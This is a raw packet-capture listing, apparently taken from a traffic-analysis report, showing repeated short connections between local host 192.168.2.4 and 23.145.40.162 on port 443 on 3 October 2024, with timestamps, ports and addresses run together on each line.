                                                                                                                            Oct 3, 2024 02:53:20.990134001 CEST49771443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:20.990134954 CEST49771443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:20.990230083 CEST4434977123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.024375916 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.024467945 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.024580002 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.024854898 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.024893999 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.211484909 CEST49771443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.211558104 CEST4434977123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.622314930 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.622517109 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.623280048 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.623296022 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.623491049 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.627170086 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.627191067 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.627199888 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.908746958 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.908804893 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.908901930 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.909010887 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.909061909 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.909092903 CEST49772443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.909107924 CEST4434977223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.912496090 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.912540913 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:21.912755013 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.912842035 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:21.912854910 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.501189947 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.501385927 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.502381086 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.502389908 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.502630949 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.504420996 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.504420996 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.504493952 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.783735991 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.783824921 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.783966064 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.785123110 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.785124063 CEST49773443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:22.785156012 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:22.785176992 CEST4434977323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.018471956 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.018515110 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.018596888 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.022157907 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.022200108 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.618422985 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.618640900 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.620121956 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.620155096 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.620488882 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.621083975 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.621114969 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.621124029 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.899770021 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.899854898 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.900002003 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.902714968 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.902730942 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.902764082 CEST49774443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.902775049 CEST4434977423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.905616999 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.905713081 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:23.905811071 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.906040907 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:23.906075001 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.502640963 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.502857924 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.504486084 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.504501104 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.504836082 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.505718946 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.505753040 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.505800962 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.779025078 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.779191971 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.779278994 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.779278994 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.779365063 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.779452085 CEST49775443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.779468060 CEST4434977523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.785521984 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.785610914 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:24.785742044 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.799137115 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:24.799171925 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.390659094 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.390799999 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.424812078 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.424856901 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.425770044 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.432118893 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.432171106 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.432188034 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.666610956 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.666795015 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.666872978 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.670201063 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.670242071 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.670268059 CEST49776443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.670283079 CEST4434977623.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.685482025 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.685570002 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:25.685657024 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.686043978 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:25.686079979 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.271819115 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.271986961 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.277676105 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.277730942 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.278088093 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.278937101 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.278938055 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.279038906 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.548486948 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.548573017 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.548639059 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.548715115 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.548715115 CEST49777443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.548757076 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.548788071 CEST4434977723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.556162119 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.556265116 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:26.556555986 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.556555986 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:26.556643009 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.147161961 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.147258997 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.148171902 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.148200035 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.148535967 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.149143934 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.149184942 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.149276972 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.429646969 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.429805040 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.429838896 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.429922104 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.429960966 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.429960966 CEST49778443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.429982901 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.430001974 CEST4434977823.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.433638096 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.433720112 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:27.433806896 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.434005022 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:27.434021950 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.050192118 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.050374031 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.114547014 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.114608049 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.115448952 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.116441011 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.117304087 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.117314100 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.411963940 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.412128925 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.412261963 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.413603067 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.413647890 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.413676023 CEST49779443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.413691998 CEST4434977923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.455360889 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.455470085 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:28.455583096 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.455929995 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:28.455965996 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.100337982 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.100419044 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.101457119 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.101478100 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.102258921 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.104891062 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.104928970 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.105015993 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.382349968 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.382498026 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.382519960 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.382524967 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.382575035 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.382580996 CEST49780443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.382612944 CEST4434978023.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.391607046 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.391637087 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.391700983 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.391899109 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.391912937 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.984452009 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.984524012 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.985548973 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.985558987 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.985896111 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:29.986660957 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.986685038 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:29.986690998 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.255244017 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.255304098 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.255359888 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.255367994 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.299928904 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.299947023 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.341264009 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.341326952 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.341336012 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.350770950 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.350790977 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.350853920 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.350862026 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.350899935 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.384969950 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.384989977 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.385018110 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.385032892 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.385051012 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.410059929 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.410080910 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.410118103 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.410125017 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.410145044 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.410172939 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.410181046 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.410187006 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.410238028 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.410260916 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.428170919 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.428194046 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.428252935 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.428261042 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.428287983 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.437634945 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.437654972 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.437695980 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.437702894 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.437727928 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.442404032 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.442467928 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.442476034 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.442517042 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.442564964 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.442576885 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.442621946 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.442626953 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.457415104 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.457477093 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.457483053 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.462109089 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.462162018 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.462171078 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.462254047 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.462305069 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.462366104 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.462376118 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:30.462398052 CEST49781443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:30.462403059 CEST4434978123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.041400909 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.041431904 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.041484118 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.041862965 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.041881084 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.631783009 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.631872892 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.632822037 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.632832050 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.633160114 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.633796930 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.633841038 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.633846998 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.913270950 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.913358927 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.913589954 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.913700104 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.913707972 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.913728952 CEST49782443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.913733006 CEST4434978223.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.918545961 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.918668032 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:31.918742895 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.919015884 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:31.919049978 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.523475885 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.523545027 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.524627924 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.524656057 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.524872065 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.525724888 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.525760889 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.525770903 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.807671070 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.807763100 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.807811022 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.807878971 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.807905912 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.807923079 CEST49783443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.807933092 CEST4434978323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.825423956 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.825445890 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:32.825546026 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.825756073 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:32.825768948 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.444457054 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.444572926 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:33.454612970 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:33.454631090 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.455128908 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.464132071 CEST49784443192.168.2.423.145.40.162
